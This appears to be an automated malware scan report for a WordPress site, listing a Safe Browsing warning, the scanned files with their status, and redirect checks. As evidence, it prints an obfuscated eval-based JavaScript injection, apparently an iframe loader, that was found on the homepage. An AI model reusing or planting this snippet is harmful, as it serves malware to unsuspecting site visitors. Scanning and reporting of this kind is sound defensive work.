Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thegreenphone.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thegreenphone.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 19:51:30 GMT Location: http://www.thegreenphone.org/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.thegreenphone.org/xmlrpc.php | clean |
http://www.thegreenphone.org/ | 200 OK Content-Length: 18928 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["bod"+z]++}catch(q){a2="_"}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_79_7d_75_77_74_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_79_7d_75_77_74_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_68_77_70_74_6c_6b_70_68_35_6a_81_36_78_4a_6d_72_55_57_5e_3b_35_77_6f_77_2e_42_14_11_27_79_7d_75_77_74_35_7a_7b_80_73_6c_35 Antivirus reports:
| ||
http://www.thegreenphone.org/wp-content/themes/magnifico/javascript/jquery.min.js | 200 OK Content-Length: 57290 Content-Type: application/javascript | clean |
http://www.thegreenphone.org/wp-content/themes/magnifico/javascript/jquery.featureList-1.0.0.js | 200 OK Content-Length: 1941 Content-Type: application/javascript | clean |
http://www.thegreenphone.org/wp-content/themes/magnifico/javascript/kriesi.js | 200 OK Content-Length: 351 Content-Type: application/javascript | clean |
http://twitterjs.googlecode.com/svn/trunk/src/twitter.min.js | 200 OK Content-Length: 2973 Content-Type: text/javascript | clean |
http://www.thegreenphone.org/wp-content/themes/magnifico/javascript/script.js | 200 OK Content-Length: 1312 Content-Type: application/javascript | clean |
http://www.thegreenphone.org/wp-content/themes/magnifico/javascript/cufon-yui.js | 200 OK Content-Length: 18638 Content-Type: application/javascript | clean |
http://www.thegreenphone.org/wp-content/themes/magnifico/javascript/nevis_700.font.js | 200 OK Content-Length: 14795 Content-Type: application/javascript | clean |
http://thegreenphone.org/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thegreenphone.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 19:51:30 GMT
Location: http://www.thegreenphone.org/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.thegreenphone.org/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: thegreenphone.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 19:51:30 GMT
Location: http://www.thegreenphone.org/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.thegreenphone.org/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thegreenphone.org
Referer: http://www.google.com/search?q=thegreenphone.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thegreenphone.org
Referer: http://www.google.com/search?q=thegreenphone.org
Result:
The result is similar to the first query. There are no suspicious redirects found.